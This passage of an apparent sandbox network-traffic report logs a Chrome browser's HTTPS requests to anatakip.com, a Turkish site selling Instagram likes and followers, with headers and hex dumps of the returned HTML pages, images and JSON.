                    location: https://widgets.amung.us/classic/00/55.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15ef03bad4282-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:36 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    94192.168.2.549876104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:36 UTC793OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/packages
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
                    2024-05-26 22:58:36 UTC748INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zA%2FSAtrB4nACsIrN10IaaVQ1%2BHd1emFq1clA%2BTS3hIyIYT18cs8%2FxPE7%2FUbHNSrBOtjM9Ci1fY7fXS5XAsvS4RccB5k%2B36EO89LFxkZFX%2FOH8Mqg5b5zJ3UIO9th5e4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ef05c8d8cb1-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:36 UTC621INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:36 UTC1369INData Raw: 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67
                    Data Ascii: /assets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline g
                    2024-05-26 22:58:36 UTC1369INData Raw: 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73
                    Data Ascii: avbar-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul clas


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    95192.168.2.549877104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:36 UTC591OUTGET /classic/13/1398.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:36 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:36 GMT
                    Content-Type: image/png
                    Content-Length: 1724
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-6bc"
                    expires: Wed, 15 May 2024 19:56:33 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1047723
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15ef40a6e186d-EWR
                    2024-05-26 22:58:36 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 e8 50 4c 54 45 ff ff ff ac ac ac 8e 8e 8e 95 95 95 be be be bc bc bc c8 c8 c8 c9 c9 c9 d2 d2 d2 c1 c1 c1 84 84 84 80 80 80 e9 e9 e9 d4 d4 d4 7d 7d 7d 7a 7a 7a bb bb bb b7 b7 b7 c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}
                    2024-05-26 22:58:36 UTC787INData Raw: 9d 15 c7 f2 f7 0f 69 b8 6d 7b 0b 37 55 e1 48 bf a7 bc 74 60 a2 48 9b 3c 7e b2 f2 a0 2f 2f 71 8e 86 28 39 54 e1 cc e7 3e 1a f9 27 1a f1 7d 7e 43 1c f1 9e 23 d5 87 5c cc d7 3f fc 6d fa e5 41 d7 f5 0b 55 50 52 7d d8 89 9e fd ec 2f f4 db be d7 78 75 d6 19 90 93 ed bc 56 d7 74 6e 00 c6 61 ed 72 72 da f1 5d 4c e9 22 39 4b b6 52 e2 df 1a 89 44 1e 7e e5 3c b3 2a 12 61 ed b1 4f 22 82 92 05 70 5b e4 5a 69 a9 28 1d b2 30 01 64 61 c2 6d 25 1d 52 53 01 d2 d8 fe 89 73 94 6c 28 57 43 a1 9f fe 61 de fb 60 f5 24 1e 3e bc 27 c4 78 ed f6 fe d0 2f 14 a3 0b dc 82 c5 ee c5 98 0c de 50 3f e8 cf 8f 65 5b 07 ab f1 1c ab 77 ea e3 2e 33 3f eb ba fe 31 4f 97 9f d7 19 9b bd 42 07 9b 5e 9f 0d ac 58 c5 46 5b 68 ab 37 b5 b3 d4 14 58 1d 86 e7 58 78 f8 98 b1 e5 02 7a ca 58 6e 18 22 5e 58
                    Data Ascii: im{7UHt`H<~//q(9T>'}~C#\?mAUPR}/xuVtnarr]L"9KRD~<*aO"p[Zi(0dam%RSsl(WCa`$>'x/P?e[w.3?1OB^XF[h7XXxzXn"^X


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    96192.168.2.549878172.67.141.2164433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:37 UTC549OUTGET /ajax/keep-session HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:37 UTC697INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:37 GMT
                    Content-Type: application/json
                    Content-Length: 38
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnzdYqWiTg%2Bx74mzWgVcOe5mdrLDkT0m%2FHPTG9d1y6r3rhkma8oN%2Fohwab4gJd68lptmFn25Zi60Y7zTrrb8YV7v%2Fo9bKehpmeN0u2fZdkDe55WNs4km7Tneu2Qg26M%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ef6ba5ac44f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:37 UTC38INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 6e 6f 6e 52 65 61 64 54 68 72 65 61 64 43 6f 75 6e 74 22 3a 30 7d
                    Data Ascii: {"status":"ok","nonReadThreadCount":0}


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    97192.168.2.549879104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:37 UTC359OUTGET /classic/13/1398.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:37 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:37 GMT
                    Content-Type: image/png
                    Content-Length: 1724
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-6bc"
                    expires: Wed, 15 May 2024 19:56:33 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1047724
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15ef89d27c41b-EWR
                    2024-05-26 22:58:37 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 e8 50 4c 54 45 ff ff ff ac ac ac 8e 8e 8e 95 95 95 be be be bc bc bc c8 c8 c8 c9 c9 c9 d2 d2 d2 c1 c1 c1 84 84 84 80 80 80 e9 e9 e9 d4 d4 d4 7d 7d 7d 7a 7a 7a bb bb bb b7 b7 b7 c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}
                    2024-05-26 22:58:37 UTC787INData Raw: 9d 15 c7 f2 f7 0f 69 b8 6d 7b 0b 37 55 e1 48 bf a7 bc 74 60 a2 48 9b 3c 7e b2 f2 a0 2f 2f 71 8e 86 28 39 54 e1 cc e7 3e 1a f9 27 1a f1 7d 7e 43 1c f1 9e 23 d5 87 5c cc d7 3f fc 6d fa e5 41 d7 f5 0b 55 50 52 7d d8 89 9e fd ec 2f f4 db be d7 78 75 d6 19 90 93 ed bc 56 d7 74 6e 00 c6 61 ed 72 72 da f1 5d 4c e9 22 39 4b b6 52 e2 df 1a 89 44 1e 7e e5 3c b3 2a 12 61 ed b1 4f 22 82 92 05 70 5b e4 5a 69 a9 28 1d b2 30 01 64 61 c2 6d 25 1d 52 53 01 d2 d8 fe 89 73 94 6c 28 57 43 a1 9f fe 61 de fb 60 f5 24 1e 3e bc 27 c4 78 ed f6 fe d0 2f 14 a3 0b dc 82 c5 ee c5 98 0c de 50 3f e8 cf 8f 65 5b 07 ab f1 1c ab 77 ea e3 2e 33 3f eb ba fe 31 4f 97 9f d7 19 9b bd 42 07 9b 5e 9f 0d ac 58 c5 46 5b 68 ab 37 b5 b3 d4 14 58 1d 86 e7 58 78 f8 98 b1 e5 02 7a ca 58 6e 18 22 5e 58
                    Data Ascii: im{7UHt`H<~//q(9T>'}~C#\?mAUPR}/xuVtnarr]L"9KRD~<*aO"p[Zi(0dam%RSsl(WCa`$>'x/P?e[w.3?1OB^XF[h7XXxzXn"^X


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    98192.168.2.549881104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:39 UTC835OUTGET /blog HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:39 UTC734INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdJdrC%2F8b8Jr6hdOIctdZWQCnBNRnf5dxQ96OGZyylryLiBJXLP3lx6L2dvKVssF0FmB11M5eMdINL8mz9PYrIiZ7vVvse%2BviStK5hElXn%2FWFXyR0i7Nm0ekxMHzs90%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15f03fdaa4316-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:39 UTC635INData Raw: 31 66 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1f5a<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:39 UTC1369INData Raw: 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 49 6e 73 74 61 67 72 61 6d 20 48 61 6b 6b c4 b1 6e 64 61 20 42 69 6c 6d 65 6e 69 7a 20 47 65 72 65 6b 65 6e 6c 65 72 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69
                    Data Ascii: paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Instagram Hakknda Bilmeniz Gerekenler | AnaTakip kendinizi instagram en iyi profi
                    2024-05-26 22:58:39 UTC1369INData Raw: 2d 6e 61 76 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 6c 69 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 74 6e 22 3e 0a 3c 61 20 69 64 3d 22 6c 6f 67 69 6e 41 73 55 73 65 72 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 69 67 6e 2d 69 6e 22 3e 3c 2f 69 3e 0a 47 c4 b0 52 c4 b0 c5 9e 0a 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 20 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22
                    Data Ascii: -nav pull-left"><li><p class="navbar-btn"><a id="loginAsUser" class="btn btn-primary" href="/login"><i class="fa fa-sign-in"></i>GR</a></p></li></ul><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="
                    2024-05-26 22:58:39 UTC1369INData Raw: 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2e 70 6e 67 22 20 2f 3e 0a 3c 70 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 61 74 61 6b 69 70 2e 63 6f 6d 22 3e 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 76 65 20 74 61 6b 69 70 c3 a7 69 20 73 69 74 65 73 69 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 22 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 22 3e
                    Data Ascii: <div class="container"><div class="row"><div class="col-md-3"><img class="img-responsive" src="/assets/logo/logo.png" /><p><a href="https://anatakip.com">instagram beeni ve takipi sitesi</a></p><ul class="list-unstyled"><li><a href="/tools">
                    2024-05-26 22:58:39 UTC1369INData Raw: 64 79 22 3e 0a 3c 68 33 3e c4 b0 6c 65 74 69 c5 9f 69 6d 20 42 69 6c 67 69 6c 65 72 69 3c 2f 68 33 3e 0a 3c 70 3e 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 6b 20 69 c3 a7 69 6e 20 61 c5 9f 61 c4 9f c4 b1 64 61 20 62 75 6c 75 6e 61 6e 20 69 6c 65 74 69 c5 9f 69 6d 20 6b 61 6e 61 6c 6c 61 72 c4 b1 6e 64 61 6e 20 62 69 7a 65 20 75 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 70 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 30 61 66 66 30 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6b 79 70 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 53 6b 79 70 65 20 3c 2f 73 70 61 6e 3e 0a 3a 0a 3c 62 3e 3c 2f 62 3e 0a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e
                    Data Ascii: dy"><h3>letiim Bilgileri</h3><p>Kredi satn almak iin aada bulunan iletiim kanallarndan bize ulaabilirsiniz.</p><p><span style="color:#00aff0"><i class="fa fa-skype" aria-hidden="true"></i> Skype </span>:<b></b></p></div></div>
                    2024-05-26 22:58:39 UTC1369INData Raw: 6e 69 74 50 72 6f 6a 65 63 74 28 29 3b 0a 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 2f 2a 20 54 68 65 20 4d 6f 64 61 6c 20 28 62 61 63 6b 67 72 6f 75 6e 64 29 20 2a 2f 0a 09 09 09 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0a 09 09 09 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 2f 2a 20 53 74 61 79 20 69 6e 20 70 6c 61 63 65 20 2a 2f 0a 09 09 09 09 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 2f 2a 20 53 69 74 20 6f 6e 20 74 6f 70 20 2a 2f 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 20 2f 2a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 62 6f 78
                    Data Ascii: nitProject();</script><style>/* The Modal (background) */.modal {display: none; /* Hidden by default */position: fixed; /* Stay in place */z-index: 1; /* Sit on top */padding-top: 100px; /* Location of the box
